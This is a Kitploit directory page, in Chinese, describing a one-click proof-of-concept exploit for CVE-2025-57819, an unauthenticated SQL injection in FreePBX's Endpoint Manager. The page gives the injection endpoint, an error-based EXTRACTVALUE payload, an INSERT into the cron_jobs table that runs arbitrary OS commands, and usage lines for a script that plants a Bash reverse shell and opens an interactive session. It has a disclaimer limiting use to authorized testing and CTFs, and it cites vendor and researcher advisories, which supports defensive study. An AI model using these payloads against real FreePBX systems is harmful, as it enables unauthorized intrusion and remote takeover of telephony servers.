Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-57819-poc — CVE-2025-57819 -> rce | Kitploit
工具/GitHubGitHub/b4sh2/cve-2025-57819-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

查看仓库
722个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-57819 — FreePBX 未认证 SQL 注入 → 远程代码执行

针对 FreePBX Endpoint Manager 未认证 SQL 注入(CVE-2025-57819)的一键利用程序,通过 FreePBX cron_jobs 表桥接实现远程代码执行。

仅限授权的安全测试 / CTF 使用。


漏洞

Endpoint 模块的 Ajax 处理器将 brand 参数直接拼接到 SQL 查询中,且模块路径 FreePBX\modules\endpoint\ajax 绕过了 Ajax 的 Referrer / 认证检查。这提供了一个未认证的基于错误的 SQL 注入(通过 EXTRACTVALUE),并启用了堆叠查询写入。

注入点:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<注入点>

验证(基于错误的读取):

root@kitploit:~
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}

影响版本: FreePBX 15 < 15.0.66,16 < 16.0.89,17 < 17.0.3。

RCE 技术

该注入本身是只读的,但堆叠查询允许写入。FreePBX 通过其 cron 管理器从 cron_jobs 表中执行任务,因此插入一行即可实现任意命令执行(大约 60 秒内,计划为 * * * * *):

root@kitploit:~
INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<任务名>','<操作系统命令>',NULL,'* * * * *',30,1,1);

注入的命令是一个 Bash 反弹 Shell。该 cron 行在第一次回调后自动删除,以避免重复连接。

要求

root@kitploit:~
pip install requests urllib3

Python 3。内置的 IP 检测(-i/--interface)仅限 Linux;其他平台请使用 --ip。

用法

root@kitploit:~
# 默认:接口 tun0,端口 4444 — 启动监听器,利用漏洞,获得 Shell
python3 exploit.py http://{目标地址}

# 选择不同的接口 / 端口
python3 exploit.py http://{目标地址} -i eth0 -p 9001

# 显式设置监听器 IP
python3 exploit.py http://{目标地址} --ip 10.10.15.52

python3 exploit.py --help

脚本功能:

  1. 确认 SQL 注入(泄露数据库版本)。
  2. 在所选端口上启动 TCP 监听器。
  3. 注入反弹 Shell 的 cron 任务并验证行已写入。
  4. 等待约 70 秒的回调,然后进入交互式 Shell(尝试自动 PTY 升级)。
  5. 清理注入的 cron 行。

参考资料

  • Horizon3.ai — 已更新的 FreePBX CVE:认证绕过与 RCE
  • watchTowr Labs — FreePBX CVE-2025-57819
  • watchTowr PoC (GitHub)
  • NVD — CVE-2025-57819
  • FreePBX 安全公告 GHSA-m42g-xg4c-5f3h
下载工具